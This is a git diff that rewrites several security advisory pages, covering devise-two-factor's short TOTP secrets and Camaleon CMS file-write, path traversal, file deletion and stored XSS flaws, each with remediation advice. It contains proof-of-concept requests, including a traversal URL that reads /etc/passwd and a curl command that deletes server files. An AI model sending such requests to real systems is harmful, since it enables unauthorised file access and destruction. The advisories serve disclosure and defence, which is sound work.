-    Devise-Two-Factor uses [ROTP](https://github.com/mdp/rotp) to
-    generate shared secrets for TOTP. In ROTP < 5.0.0, the first
-    argument to the "ROTP::Base32#random_base32" function represented
-    the number of bytes to read from SecureRandom which were then
-    returned as a base32-encoded string. In ROTP 5.1.0, this function
-    was changed so that the first argument now represents the length
-    of the base32-encoded string returned by the function instead
-    of the number of bytes to read from SecureRandom resulting in
-    a shorter key being generated for the same input value.
-    (https://github.com/mdp/rotp/commit/c6c24ab894e7c2b1579d45ac82c41454d1e98227).
-  cvss_v3: 5.3
-  cvss_v4: 6.0
-  unaffected_versions:
-  - "< 2.2.0"
-  patched_versions:
-  - ">= 6.0.0"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2024-8796
-    - https://github.com/devise-two-factor/devise-two-factor/security/advisories/GHSA-qjxf-mc72-wjr2
-    - https://github.com/devise-two-factor/devise-two-factor/commit/cc6f34423d9c6af9f3e02be478c3c40dc7462e19
-    - https://github.com/advisories/GHSA-qjxf-mc72-wjr2
----
+---
+layout: advisory
+title: 'CVE-2024-8796 (devise-two-factor): Devise-Two-Factor Authentication Uses Insufficient
+  Default OTP Shared Secret Length'
+comments: false
+categories:
+- devise-two-factor
+advisory:
+  gem: devise-two-factor
+  cve: 2024-8796
+  ghsa: qjxf-mc72-wjr2
+  url: https://github.com/devise-two-factor/devise-two-factor/security/advisories/GHSA-qjxf-mc72-wjr2
+  title: Devise-Two-Factor Authentication Uses Insufficient Default OTP Shared Secret
+    Length
+  date: 2024-09-17
+  description: |
+    ### Summary
+    Under the default configuration, Devise-Two-Factor version
+    >= 2.2.0 & < 6.0.0 generate TOTP shared secrets that are 120 bits
+    instead of the 128-bit minimum defined by
+    [RFC 4226](https://datatracker.ietf.org/doc/html/rfc4226).
+    Using a shared secret shorter than the minimum to generate a
+    multi-factor authentication code could make it easier for an
+    attacker to guess the shared secret and generate valid TOTP codes.
+
+    ### Remediation
+    Devise-Two-Factor should be upgraded to version v6.0.0 as soon
+    as possible. After upgrading, the length of shared secrets and
+    TOTP URLs generated by the library will increase since the new
+    shared secrets will be longer.
+
+    If upgrading is not possible, you can override the default
+    `otp_secret_length` attribute in the model when configuring
+    `two_factor_authenticable` and set it to a value of at least
+    26 to ensure newly generated shared secrets are at least
+    128-bits long.
+
+    After upgrading or implementing the workaround, applications
+    using Devise-Two-Factor may wish to migrate users to the new
+    OTP length to provide increased protection for those accounts.
+    Turning off OTP for users by setting `otp_required_for_login`
+    to false is not recommended since it would leave accounts
+    unprotected. However, you may wish to implement application
+    logic that checks the length of a user's shared secret and
+    prompts users to re-enroll in OTP.
+
+    ### Background
+    Devise-Two-Factor uses [ROTP](https://github.com/mdp/rotp) to
+    generate shared secrets for TOTP. In ROTP < 5.0.0, the first
+    argument to the "ROTP::Base32#random_base32" function represented
+    the number of bytes to read from SecureRandom which were then
+    returned as a base32-encoded string. In ROTP 5.1.0, this function
+    was changed so that the first argument now represents the length
+    of the base32-encoded string returned by the function instead
+    of the number of bytes to read from SecureRandom resulting in
+    a shorter key being generated for the same input value.
+    (https://github.com/mdp/rotp/commit/c6c24ab894e7c2b1579d45ac82c41454d1e98227).
+  cvss_v3: 5.3
+  cvss_v4: 6.0
+  unaffected_versions:
+  - "< 2.2.0"
+  patched_versions:
+  - ">= 6.0.0"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-8796
+    - https://github.com/devise-two-factor/devise-two-factor/security/advisories/GHSA-qjxf-mc72-wjr2
+    - https://github.com/devise-two-factor/devise-two-factor/commit/cc6f34423d9c6af9f3e02be478c3c40dc7462e19
+    - https://github.com/advisories/GHSA-qjxf-mc72-wjr2
+---
diff --git a/advisories/_posts/2024-09-18-CVE-2024-46986.md b/advisories/_posts/2024-09-18-CVE-2024-46986.md
index 3855f6cc..f5990a84 100644
--- a/advisories/_posts/2024-09-18-CVE-2024-46986.md
+++ b/advisories/_posts/2024-09-18-CVE-2024-46986.md
@@ -1,111 +1,111 @@
----
-layout: advisory
-title: 'CVE-2024-46986 (camaleon_cms): Camaleon CMS affected by arbitrary file write
-  to RCE (GHSL-2024-182)'
-comments: false
-categories:
-- camaleon_cms
-advisory:
-  gem: camaleon_cms
-  cve: 2024-46986
-  ghsa: wmjg-vqhv-q5p5
-  url: https://github.com/owen2345/camaleon-cms/security/advisories/GHSA-wmjg-vqhv-q5p5
-  title: Camaleon CMS affected by arbitrary file write to RCE (GHSL-2024-182)
-  date: 2024-09-18
-  description: |
-    An arbitrary file write vulnerability accessible via the upload method
-    of the `MediaController` allows authenticated users to write arbitrary
-    files to any location on the web server Camaleon CMS is running on
-    (depending on the permissions of the underlying filesystem).
-    E.g. This can lead to a delayed remote code execution in case an
-    attacker is able to write a Ruby file into the `config/initializers/`
-    subfolder of the Ruby on Rails application.
-
-    Once a user upload is started via the [upload] method, the
-    `file_upload` and the folder parameter.
-
-    [upload]: https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/controllers/camaleon_cms/admin/media_controller.rb#L86-L87
-
-    ```ruby
-    def upload(settings = {})
-      params[:dimension] = nil if params[:skip_auto_crop].present?
-      f = { error: 'File not found.' }
-      if params[:file_upload].present?
-        f = upload_file(params[:file_upload],
-                        { folder: params[:folder], dimension: params['dimension'], formats: params[:formats], versions: params[:versions],
-                          thumb_size: params[:thumb_size] }.merge(settings))
-      end
-      [..]
-    end
-    ```
-
-    are passed to the [upload_file] method. Inside that method the
-    given settings are [merged] with some presets. The file format
-    is [checked against] the formats settings we can override with
-    the formats parameters.
-
-    [upload_file]: https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/helpers/camaleon_cms/uploader_helper.rb#L23-L24
-    [merged]: https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/helpers/camaleon_cms/uploader_helper.rb#L41-L42
-    [checked against]: https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/helpers/camaleon_cms/uploader_helper.rb#L61-L62
-
-    ```ruby
-    # formats validations
-      return { error: "#{ct('file_format_error')} (#{settings[:formats]})" } unless cama_uploader.class.validate_file_format(
-        uploaded_io.path, settings[:formats]
-     )
-    ```
-
-    Our given folder is then [passed unchecked] to the `Cama_uploader`:
-
-    [passed unchecked]: https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/helpers/camaleon_cms/uploader_helper.rb#L73-L74
-
-    ```ruby
-    key = File.join(settings[:folder], settings[:filename]).to_s.cama_fix_slash
-    res = cama_uploader.add_file(settings[:uploaded_io], key, { same_name: settings[:same_name] })
-    ```
-
-    In the [add_file] method of `CamaleonCmsLocalUploader` this key argument containing the
-    unchecked path is then used to write the file to the file system:
-
-    [add_file]: https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/uploaders/camaleon_cms_local_uploader.rb#L77
-
-    ```ruby
-    def add_file(uploaded_io_or_file_path, key, args = {})
-      [..]
-      upload_io = uploaded_io_or_file_path.is_a?(String) ? File.open(uploaded_io_or_file_path) : uploaded_io_or_file_path
-      File.open(File.join(@root_folder, key), 'wb') { |file| file.write(upload_io.read) }
-      [..]
-    end
-    ```
-
-    ## Impact
-
-    This issue may lead up to Remote Code Execution (RCE) via arbitrary
-    file write.
-
-    ## Remediation
-
-    Normalize file paths constructed from untrusted user input before using
-    them and check that the resulting path is inside the targeted directory.
-    Additionally, do not allow character sequences such as `..` in untrusted
-    input that is used to build paths.
-
-    ## See Also
-
-    [CodeQL: Uncontrolled data used in path expression](https://codeql.github.com/codeql-query-help/ruby/rb-path-injection/)
-    [OWASP: Path Traversal](https://owasp.org/www-community/attacks/Path_Traversal)
-  cvss_v3: 9.9
-  unaffected_versions:
-  - "< 2.8.0"
-  patched_versions:
-  - ">= 2.8.1"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2024-46986
-    - https://github.com/owen2345/camaleon-cms/security/advisories/GHSA-wmjg-vqhv-q5p5
-    - https://github.com/owen2345/camaleon-cms/commit/b3b12b1e4a9e3fccaf5bb4330820fa7f8744e6bd
-    - https://codeql.github.com/codeql-query-help/ruby/rb-path-injection
-    - https://owasp.org/www-community/attacks/Path_Traversal
-    - https://www.reddit.com/r/rails/comments/1exwtdm/camaleon_cms_281_has_been_released
-    - https://github.com/advisories/GHSA-wmjg-vqhv-q5p5
----
+---
+layout: advisory
+title: 'CVE-2024-46986 (camaleon_cms): Camaleon CMS affected by arbitrary file write
+  to RCE (GHSL-2024-182)'
+comments: false
+categories:
+- camaleon_cms
+advisory:
+  gem: camaleon_cms
+  cve: 2024-46986
+  ghsa: wmjg-vqhv-q5p5
+  url: https://github.com/owen2345/camaleon-cms/security/advisories/GHSA-wmjg-vqhv-q5p5
+  title: Camaleon CMS affected by arbitrary file write to RCE (GHSL-2024-182)
+  date: 2024-09-18
+  description: |
+    An arbitrary file write vulnerability accessible via the upload method
+    of the `MediaController` allows authenticated users to write arbitrary
+    files to any location on the web server Camaleon CMS is running on
+    (depending on the permissions of the underlying filesystem).
+    E.g. This can lead to a delayed remote code execution in case an
+    attacker is able to write a Ruby file into the `config/initializers/`
+    subfolder of the Ruby on Rails application.
+
+    Once a user upload is started via the [upload] method, the
+    `file_upload` and the folder parameter.
+
+    [upload]: https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/controllers/camaleon_cms/admin/media_controller.rb#L86-L87
+
+    ```ruby
+    def upload(settings = {})
+      params[:dimension] = nil if params[:skip_auto_crop].present?
+      f = { error: 'File not found.' }
+      if params[:file_upload].present?
+        f = upload_file(params[:file_upload],
+                        { folder: params[:folder], dimension: params['dimension'], formats: params[:formats], versions: params[:versions],
+                          thumb_size: params[:thumb_size] }.merge(settings))
+      end
+      [..]
+    end
+    ```
+
+    are passed to the [upload_file] method. Inside that method the
+    given settings are [merged] with some presets. The file format
+    is [checked against] the formats settings we can override with
+    the formats parameters.
+
+    [upload_file]: https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/helpers/camaleon_cms/uploader_helper.rb#L23-L24
+    [merged]: https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/helpers/camaleon_cms/uploader_helper.rb#L41-L42
+    [checked against]: https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/helpers/camaleon_cms/uploader_helper.rb#L61-L62
+
+    ```ruby
+    # formats validations
+      return { error: "#{ct('file_format_error')} (#{settings[:formats]})" } unless cama_uploader.class.validate_file_format(
+        uploaded_io.path, settings[:formats]
+     )
+    ```
+
+    Our given folder is then [passed unchecked] to the `Cama_uploader`:
+
+    [passed unchecked]: https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/helpers/camaleon_cms/uploader_helper.rb#L73-L74
+
+    ```ruby
+    key = File.join(settings[:folder], settings[:filename]).to_s.cama_fix_slash
+    res = cama_uploader.add_file(settings[:uploaded_io], key, { same_name: settings[:same_name] })
+    ```
+
+    In the [add_file] method of `CamaleonCmsLocalUploader` this key argument containing the
+    unchecked path is then used to write the file to the file system:
+
+    [add_file]: https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/uploaders/camaleon_cms_local_uploader.rb#L77
+
+    ```ruby
+    def add_file(uploaded_io_or_file_path, key, args = {})
+      [..]
+      upload_io = uploaded_io_or_file_path.is_a?(String) ? File.open(uploaded_io_or_file_path) : uploaded_io_or_file_path
+      File.open(File.join(@root_folder, key), 'wb') { |file| file.write(upload_io.read) }
+      [..]
+    end
+    ```
+
+    ## Impact
+
+    This issue may lead up to Remote Code Execution (RCE) via arbitrary
+    file write.
+
+    ## Remediation
+
+    Normalize file paths constructed from untrusted user input before using
+    them and check that the resulting path is inside the targeted directory.
+    Additionally, do not allow character sequences such as `..` in untrusted
+    input that is used to build paths.
+
+    ## See Also
+
+    [CodeQL: Uncontrolled data used in path expression](https://codeql.github.com/codeql-query-help/ruby/rb-path-injection/)
+    [OWASP: Path Traversal](https://owasp.org/www-community/attacks/Path_Traversal)
+  cvss_v3: 9.9
+  unaffected_versions:
+  - "< 2.8.0"
+  patched_versions:
+  - ">= 2.8.1"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-46986
+    - https://github.com/owen2345/camaleon-cms/security/advisories/GHSA-wmjg-vqhv-q5p5
+    - https://github.com/owen2345/camaleon-cms/commit/b3b12b1e4a9e3fccaf5bb4330820fa7f8744e6bd
+    - https://codeql.github.com/codeql-query-help/ruby/rb-path-injection
+    - https://owasp.org/www-community/attacks/Path_Traversal
+    - https://www.reddit.com/r/rails/comments/1exwtdm/camaleon_cms_281_has_been_released
+    - https://github.com/advisories/GHSA-wmjg-vqhv-q5p5
+---
diff --git a/advisories/_posts/2024-09-18-CVE-2024-46987.md b/advisories/_posts/2024-09-18-CVE-2024-46987.md
index f5d8444f..e151e3b1 100644
--- a/advisories/_posts/2024-09-18-CVE-2024-46987.md
+++ b/advisories/_posts/2024-09-18-CVE-2024-46987.md
@@ -1,86 +1,86 @@
----
-layout: advisory
-title: 'CVE-2024-46987 (camaleon_cms): Camaleon CMS vulnerable to arbitrary path traversal
-  (GHSL-2024-183)'
-comments: false
-categories:
-- camaleon_cms
-advisory:
-  gem: camaleon_cms
-  cve: 2024-46987
-  ghsa: cp65-5m9r-vc2c
-  url: https://github.com/owen2345/camaleon-cms/security/advisories/GHSA-cp65-5m9r-vc2c
-  title: Camaleon CMS vulnerable to arbitrary path traversal (GHSL-2024-183)
-  date: 2024-09-18
-  description: |
-    A path traversal vulnerability accessible via MediaController's
-    download_private_file method allows authenticated users to download
-    any file on the web server Camaleon CMS is running on (depending
-    on the file permissions).
-
-    In the [download_private_file] method:
-
-    ```ruby
-    def download_private_file
-      cama_uploader.enable_private_mode!
-
-      file = cama_uploader.fetch_file("private/#{params[:file]}")
-
-      send_file file, disposition: 'inline'
-    end
-    ```
-
-    [download_private_file]: https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/controllers/camaleon_cms/admin/media_controller.rb#L28
-
-    The file parameter is passed to the [fetch_file] method of the
-    CamaleonCmsLocalUploader class (when files are uploaded locally):
-
-    ```ruby
-    def fetch_file(file_name)
-      raise ActionController::RoutingError, 'File not found' unless file_exists?(file_name)
-
-      file_name
-    end
-    ```
-
-    [fetch_file]: https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/uploaders/camaleon_cms_local_uploader.rb#L27
-
-    If the file exists it's passed back to the download_private_file method
-    where the file is sent to the user via [send_file].
-
-    [send_file]: https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/controllers/camaleon_cms/admin/media_controller.rb#L33-L34
-
-    ## Proof of concept
-
-    An authenticated user can download the /etc/passwd file by visiting an URL such as:
-
-        https://<camaleon-host>/admin/media/download_private_file?file=../../../../../../etc/passwd
-
-    ## Impact
-
-    This issue may lead to Information Disclosure.
-
-    ## Remediation
-
-    Normalize file paths constructed from untrusted user input before using
-    them and check that the resulting path is inside the targeted directory.
-    Additionally, do not allow character sequences such as `..` in untrusted
-    input that is used to build paths.
-
-    ## See Also
-
-    * [CodeQL: Uncontrolled data used in path expression](https://codeql.github.com/codeql-query-help/ruby/rb-path-injection/)
-    * [OWASP: Path Traversal](https://owasp.org/www-community/attacks/Path_Traversal)
-  cvss_v3: 7.7
-  patched_versions:
-  - ">= 2.8.1"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2024-46987
-    - https://github.com/owen2345/camaleon-cms/security/advisories/GHSA-cp65-5m9r-vc2c
-    - https://github.com/owen2345/camaleon-cms/commit/071b1b09d6d61ab02a5960b1ccafd9d9c2155a3e
-    - https://codeql.github.com/codeql-query-help/ruby/rb-path-injection
-    - https://owasp.org/www-community/attacks/Path_Traversal
-    - https://www.reddit.com/r/rails/comments/1exwtdm/camaleon_cms_281_has_been_released
-    - https://github.com/advisories/GHSA-cp65-5m9r-vc2c
----
+---
+layout: advisory
+title: 'CVE-2024-46987 (camaleon_cms): Camaleon CMS vulnerable to arbitrary path traversal
+  (GHSL-2024-183)'
+comments: false
+categories:
+- camaleon_cms
+advisory:
+  gem: camaleon_cms
+  cve: 2024-46987
+  ghsa: cp65-5m9r-vc2c
+  url: https://github.com/owen2345/camaleon-cms/security/advisories/GHSA-cp65-5m9r-vc2c
+  title: Camaleon CMS vulnerable to arbitrary path traversal (GHSL-2024-183)
+  date: 2024-09-18
+  description: |
+    A path traversal vulnerability accessible via MediaController's
+    download_private_file method allows authenticated users to download
+    any file on the web server Camaleon CMS is running on (depending
+    on the file permissions).
+
+    In the [download_private_file] method:
+
+    ```ruby
+    def download_private_file
+      cama_uploader.enable_private_mode!
+
+      file = cama_uploader.fetch_file("private/#{params[:file]}")
+
+      send_file file, disposition: 'inline'
+    end
+    ```
+
+    [download_private_file]: https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/controllers/camaleon_cms/admin/media_controller.rb#L28
+
+    The file parameter is passed to the [fetch_file] method of the
+    CamaleonCmsLocalUploader class (when files are uploaded locally):
+
+    ```ruby
+    def fetch_file(file_name)
+      raise ActionController::RoutingError, 'File not found' unless file_exists?(file_name)
+
+      file_name
+    end
+    ```
+
+    [fetch_file]: https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/uploaders/camaleon_cms_local_uploader.rb#L27
+
+    If the file exists it's passed back to the download_private_file method
+    where the file is sent to the user via [send_file].
+
+    [send_file]: https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/controllers/camaleon_cms/admin/media_controller.rb#L33-L34
+
+    ## Proof of concept
+
+    An authenticated user can download the /etc/passwd file by visiting an URL such as:
+
+        https://<camaleon-host>/admin/media/download_private_file?file=../../../../../../etc/passwd
+
+    ## Impact
+
+    This issue may lead to Information Disclosure.
+
+    ## Remediation
+
+    Normalize file paths constructed from untrusted user input before using
+    them and check that the resulting path is inside the targeted directory.
+    Additionally, do not allow character sequences such as `..` in untrusted
+    input that is used to build paths.
+
+    ## See Also
+
+    * [CodeQL: Uncontrolled data used in path expression](https://codeql.github.com/codeql-query-help/ruby/rb-path-injection/)
+    * [OWASP: Path Traversal](https://owasp.org/www-community/attacks/Path_Traversal)
+  cvss_v3: 7.7
+  patched_versions:
+  - ">= 2.8.1"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-46987
+    - https://github.com/owen2345/camaleon-cms/security/advisories/GHSA-cp65-5m9r-vc2c
+    - https://github.com/owen2345/camaleon-cms/commit/071b1b09d6d61ab02a5960b1ccafd9d9c2155a3e
+    - https://codeql.github.com/codeql-query-help/ruby/rb-path-injection
+    - https://owasp.org/www-community/attacks/Path_Traversal
+    - https://www.reddit.com/r/rails/comments/1exwtdm/camaleon_cms_281_has_been_released
+    - https://github.com/advisories/GHSA-cp65-5m9r-vc2c
+---
diff --git a/advisories/_posts/2024-09-18-GHSA-7x4w-cj9r-h4v9.md b/advisories/_posts/2024-09-18-GHSA-7x4w-cj9r-h4v9.md
index b0e7f3e7..842a026e 100644
--- a/advisories/_posts/2024-09-18-GHSA-7x4w-cj9r-h4v9.md
+++ b/advisories/_posts/2024-09-18-GHSA-7x4w-cj9r-h4v9.md
@@ -1,89 +1,89 @@
----
-layout: advisory
-title: 'GHSA-7x4w-cj9r-h4v9 (camaleon_cms): Camaleon CMS vulnerable to remote code
-  execution through code injection (GHSL-2024-185)'
-comments: false
-categories:
-- camaleon_cms
-advisory:
-  gem: camaleon_cms
-  ghsa: 7x4w-cj9r-h4v9
-  url: https://github.com/owen2345/camaleon-cms/security/advisories/GHSA-7x4w-cj9r-h4v9
-  title: Camaleon CMS vulnerable to remote code execution through code injection (GHSL-2024-185)
-  date: 2024-09-18
-  description: |
-    The [actions](https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/controllers/camaleon_cms/admin/media_controller.rb#L51-L52)
-    defined inside of the MediaController class do not check whether a
-    given path is inside a certain path (e.g. inside the media folder).
-    If an attacker performed an account takeover of an administrator
-    account (See: GHSL-2024-184) they could delete arbitrary files or
-    folders on the server hosting Camaleon CMS. The
-    [crop_url](https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/controllers/camaleon_cms/admin/media_controller.rb#L64-L65)
-    action might make arbitrary file writes (similar impact to GHSL-2024-182)
-    for any authenticated user possible, but it doesn't seem to work currently.
-
-    Arbitrary file deletion can be exploited with following code path:
-    The parameter folder flows from the actions method:
-    ```ruby
-      def actions
-        authorize! :manage, :media if params[:media_action] != 'crop_url'
-        params[:folder] = params[:folder].gsub('//', '/') if params[:folder].present?
-        case params[:media_action]
-        [..]
-        when 'del_file'
-          cama_uploader.delete_file(params[:folder].gsub('//', '/'))
-          render plain: ''
-    ```
-    into the method delete_file of the CamaleonCmsLocalUploader
-    class (when files are uploaded locally):
-    ```ruby
-    def delete_file(key)
-      file = File.join(@root_folder, key)
-      FileUtils.rm(file) if File.exist? file
-      @instance.hooks_run('after_delete', key)
-      get_media_collection.find_by_key(key).take.destroy
-    end
-    ```
-    Where it is joined in an unchecked manner with the root folder and
-    then deleted.
-
-    **Proof of concept**
-    The following request would delete the file README.md in the top
-    folder of the Ruby on Rails application. (The values for auth_token,
-    X-CSRF-Token and _cms_session would also need to be replaced with
-    authenticated values in the curl command below)
-    ```
-    curl --path-as-is -i -s -k -X $'POST' \
-        -H $'X-CSRF-Token: [..]' -H $'User-Agent: Mozilla/5.0' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'Accept: */*' -H $'Connection: keep-alive' \
-        -b $'auth_token=[..]; _cms_session=[..]' \
-        --data-binary $'versions=&thumb_size=&formats=&media_formats=&dimension=&private=&folder=..
-    2F..
-    2F..
-    2FREADME.md&media_action=del_file' \
-        $'https://<camaleon-host>/admin/media/actions?actions=true'
-    ```
-
-    **Impact**
-
-    This issue may lead to a defective CMS or system.
-
-    **Remediation**
-
-    Normalize all file paths constructed from untrusted user input
-    before using them and check that the resulting path is inside the
-    targeted directory. Additionally, do not allow character sequences
-    such as .. in untrusted input that is used to build paths.
-
-    **See also:**
-
-    [CodeQL: Uncontrolled data used in path expression](https://codeql.github.com/codeql-query-help/ruby/rb-path-injection/)
-    [OWASP: Path Traversal](https://owasp.org/www-community/attacks/Path_Traversal)
-  cvss_v3: 7.2
-  patched_versions:
-  - ">= 2.8.1"
-  related:
-    url:
-    - https://github.com/owen2345/camaleon-cms/security/advisories/GHSA-7x4w-cj9r-h4v9
-    - https://github.com/owen2345/camaleon-cms/commit/f5d032549fa0a204d06e738caf2663607967dee2
-    - https://github.com/advisories/GHSA-7x4w-cj9r-h4v9
----
+---
+layout: advisory
+title: 'GHSA-7x4w-cj9r-h4v9 (camaleon_cms): Camaleon CMS vulnerable to remote code
+  execution through code injection (GHSL-2024-185)'
+comments: false
+categories:
+- camaleon_cms
+advisory:
+  gem: camaleon_cms
+  ghsa: 7x4w-cj9r-h4v9
+  url: https://github.com/owen2345/camaleon-cms/security/advisories/GHSA-7x4w-cj9r-h4v9
+  title: Camaleon CMS vulnerable to remote code execution through code injection (GHSL-2024-185)
+  date: 2024-09-18
+  description: |
+    The [actions](https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/controllers/camaleon_cms/admin/media_controller.rb#L51-L52)
+    defined inside of the MediaController class do not check whether a
+    given path is inside a certain path (e.g. inside the media folder).
+    If an attacker performed an account takeover of an administrator
+    account (See: GHSL-2024-184) they could delete arbitrary files or
+    folders on the server hosting Camaleon CMS. The
+    [crop_url](https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/controllers/camaleon_cms/admin/media_controller.rb#L64-L65)
+    action might make arbitrary file writes (similar impact to GHSL-2024-182)
+    for any authenticated user possible, but it doesn't seem to work currently.
+
+    Arbitrary file deletion can be exploited with following code path:
+    The parameter folder flows from the actions method:
+    ```ruby
+      def actions
+        authorize! :manage, :media if params[:media_action] != 'crop_url'
+        params[:folder] = params[:folder].gsub('//', '/') if params[:folder].present?
+        case params[:media_action]
+        [..]
+        when 'del_file'
+          cama_uploader.delete_file(params[:folder].gsub('//', '/'))
+          render plain: ''
+    ```
+    into the method delete_file of the CamaleonCmsLocalUploader
+    class (when files are uploaded locally):
+    ```ruby
+    def delete_file(key)
+      file = File.join(@root_folder, key)
+      FileUtils.rm(file) if File.exist? file
+      @instance.hooks_run('after_delete', key)
+      get_media_collection.find_by_key(key).take.destroy
+    end
+    ```
+    Where it is joined in an unchecked manner with the root folder and
+    then deleted.
+
+    **Proof of concept**
+    The following request would delete the file README.md in the top
+    folder of the Ruby on Rails application. (The values for auth_token,
+    X-CSRF-Token and _cms_session would also need to be replaced with
+    authenticated values in the curl command below)
+    ```
+    curl --path-as-is -i -s -k -X $'POST' \
+        -H $'X-CSRF-Token: [..]' -H $'User-Agent: Mozilla/5.0' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'Accept: */*' -H $'Connection: keep-alive' \
+        -b $'auth_token=[..]; _cms_session=[..]' \
+        --data-binary $'versions=&thumb_size=&formats=&media_formats=&dimension=&private=&folder=..
+    2F..
+    2F..
+    2FREADME.md&media_action=del_file' \
+        $'https://<camaleon-host>/admin/media/actions?actions=true'
+    ```
+
+    **Impact**
+
+    This issue may lead to a defective CMS or system.
+
+    **Remediation**
+
+    Normalize all file paths constructed from untrusted user input
+    before using them and check that the resulting path is inside the
+    targeted directory. Additionally, do not allow character sequences
+    such as .. in untrusted input that is used to build paths.
+
+    **See also:**
+
+    [CodeQL: Uncontrolled data used in path expression](https://codeql.github.com/codeql-query-help/ruby/rb-path-injection/)
+    [OWASP: Path Traversal](https://owasp.org/www-community/attacks/Path_Traversal)
+  cvss_v3: 7.2
+  patched_versions:
+  - ">= 2.8.1"
+  related:
+    url:
+    - https://github.com/owen2345/camaleon-cms/security/advisories/GHSA-7x4w-cj9r-h4v9
+    - https://github.com/owen2345/camaleon-cms/commit/f5d032549fa0a204d06e738caf2663607967dee2
+    - https://github.com/advisories/GHSA-7x4w-cj9r-h4v9
+---
diff --git a/advisories/_posts/2024-09-18-GHSA-r9cr-qmfw-pmrc.md b/advisories/_posts/2024-09-18-GHSA-r9cr-qmfw-pmrc.md
index 238a78ea..e6258844 100644
--- a/advisories/_posts/2024-09-18-GHSA-r9cr-qmfw-pmrc.md
+++ b/advisories/_posts/2024-09-18-GHSA-r9cr-qmfw-pmrc.md
@@ -1,60 +1,60 @@
----
-layout: advisory
-title: 'GHSA-r9cr-qmfw-pmrc (camaleon_cms): Camaleon CMS vulnerable to stored XSS
-  through user file upload (GHSL-2024-184)'
-comments: false
-categories:
-- camaleon_cms
-advisory:
-  gem: camaleon_cms
-  ghsa: r9cr-qmfw-pmrc
-  url: https://github.com/owen2345/camaleon-cms/security/advisories/GHSA-r9cr-qmfw-pmrc
-  title: Camaleon CMS vulnerable to stored XSS through user file upload (GHSL-2024-184)
-  date: 2024-09-18
-  description: |
-    A stored cross-site scripting has been found in the image upload
-    functionality that can be used by normal registered users:
-    It is possible to upload a SVG image containing JavaScript and
-    it's also possible to upload a HTML document when the format
-    parameter is manually changed to [documents][1] or a string of an
-    [unsupported format][2]. If an authenticated user or administrator
-    visits that uploaded image or document malicious JavaScript can be
-    executed on their behalf
-    (e.g. changing or deleting content inside of the CMS.)
-
-    [1]: https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/uploaders/camaleon_cms_uploader.rb#L105-L106
-    [2]: https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/uploaders/camaleon_cms_uploader.rb#L110-L111
-
-    ## Impact
-
-    This issue may lead to account takeover due to reflected
-    Cross-site scripting (XSS).
-
-    ## Remediation
-
-    Only allow the upload of safe files such as PNG, TXT and others
-    or serve all "unsafe" files such as SVG and other files with a
-    content-disposition: attachment header, which should prevent
-    browsers from displaying them.
-
-    Additionally, a [Content security policy (CSP)][3]
-    can be created that disallows inlined script. (Other parts of the
-    application might need modification to continue functioning.)
-
-    [3]: https://web.dev/articles/csp
-
-    To prevent the theft of the auth_token it could be marked with
-    HttpOnly. This would however not prevent that actions could be
-    performed as the authenticated user/administrator. Furthermore,
-    it could make sense to use the authentication provided by
-    Ruby on Rails, so that stolen tokens cannot be used anymore
-    after some time.
-  cvss_v3: 5.4
-  patched_versions:
-  - ">= 2.8.1"
-  related:
-    url:
-    - https://github.com/owen2345/camaleon-cms/security/advisories/GHSA-r9cr-qmfw-pmrc
-    - https://github.com/owen2345/camaleon-cms/commit/b18fbc74f3ecd98a1f781d015f5466ef16b1425b
-    - https://github.com/advisories/GHSA-r9cr-qmfw-pmrc
----
+---
+layout: advisory
+title: 'GHSA-r9cr-qmfw-pmrc (camaleon_cms): Camaleon CMS vulnerable to stored XSS
+  through user file upload (GHSL-2024-184)'
+comments: false
+categories:
+- camaleon_cms
+advisory:
+  gem: camaleon_cms
+  ghsa: r9cr-qmfw-pmrc
+  url: https://github.com/owen2345/camaleon-cms/security/advisories/GHSA-r9cr-qmfw-pmrc
+  title: Camaleon CMS vulnerable to stored XSS through user file upload (GHSL-2024-184)
